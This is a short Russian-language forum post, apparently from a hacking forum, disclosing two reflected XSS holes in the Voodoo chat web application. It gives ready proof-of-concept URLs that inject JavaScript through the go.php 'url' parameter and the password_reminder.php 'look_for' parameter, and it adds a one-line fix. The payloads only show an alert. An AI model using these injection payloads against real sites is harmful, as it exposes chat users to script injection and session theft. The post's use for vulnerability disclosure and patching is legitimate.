Вы бы хоть писать научились...Если вы про чат то пишется Voodoo chat(модер переделай название что ли)
Выкладываю на паблик давнейшие хсс(попробуйте исполльзовать с фреймами...)
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность
с помощью сокетов.
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
------------------------------
для спасибо есть репутация,не загаживайте форум.